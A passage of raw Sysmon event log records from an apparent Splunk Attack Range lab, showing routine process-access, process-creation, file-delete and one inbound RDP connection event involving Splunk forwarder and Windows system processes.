dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981007Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.638{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981006Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.638{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981005Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.638{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981004Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.638{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8D53-6151-107A-00000000FD01}3828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981003Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.638{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D53-6151-107A-00000000FD01}3828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981002Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.623{69CF5F33-8D53-6151-107A-00000000FD01}3828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981001Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.231{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03B119FC539407C9826126130F408F86,SHA256=4A63E50C2493A7C644385E1AB996B891371D363F33ED86FC8DC0875F94329004,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981000Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:23.876{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com28283-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001056240Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:28.686{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCAD28F008149D9EA41291939E3022EE,SHA256=94A3D57F18B5B535FA5D9B1AC2B95ADB27324968697FA4548159F23D8F1E558A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981030Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.372{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=016555E20D20D7799D8566CB8EBFA762,SHA256=C4FB90457AC1097049290CEA534D5E1F50BF49E2684133F50EF3610C399630BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056239Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:28.155{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E3684EB052BEF81EE223746DDEA09DEE,SHA256=29D4E0C1599BEE63931E024E2A74C3F540954BE169C4E60135E1B5E117CA8291,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056238Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:28.155{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=596284A40D7756D012EC451CEC586C40,SHA256=856E42C306284DF0CD9FF106E6F61B41A231E5899CAB9AC8534AC6CB4E0079DD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981029Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.325{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D54-6151-117A-00000000FD01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981028Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.325{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981027Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.325{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981026Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.325{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981025Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.325{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981024Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.325{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981023Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.325{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981022Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.325{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981021Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.325{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981020Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.310{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981019Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.310{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8D54-6151-117A-00000000FD01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981018Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.310{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D54-6151-117A-00000000FD01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981017Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:28.310{69CF5F33-8D54-6151-117A-00000000FD01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981016Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:27.997{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9132BCC31873864C52AFDDC230C9201E,SHA256=D3DB21E4D02FA4E34241940EEBBDEE448E3F8ADD9FE29088F5DF358BED0A5B3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056243Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:29.889{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6539735488C65559A6C8D72A11608B2C,SHA256=AC48D13F00FF0062240ACE2C0A7484873028EA1B2D2B6EA1311108150A3C52AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981046Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF3F64857D8D69330402FEBF2DA0B637,SHA256=A3105FFE07512DABC2B7678BE162CEA37C99CCDE0850E5CDFFCE663F141369C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981045Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E254E9D3A38559B8526BAFC5F7B0799,SHA256=A9F0930C867144112B9B23F7EE71F96B27B7CC78D965FE82D374752BF43C0915,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056242Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:29.342{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=91C9E2C3A9C05640CCB13E01A60E6502,SHA256=0F46C26A45D0D9D6B8995D015DF003431091A2A96B8320BFA513185FBBEC4F8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056241Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:29.342{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=26310B83F500BB2B3F1662DAD74F28C0,SHA256=14BC142E0299B15F8CD28A6DAD5F909FEDE64F01BCDF55191D90D3DF99AAC7AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981044Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.153{69CF5F33-8D54-6151-127A-00000000FD01}22841436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981043Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:29.013{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D54-6151-127A-00000000FD01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981042Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 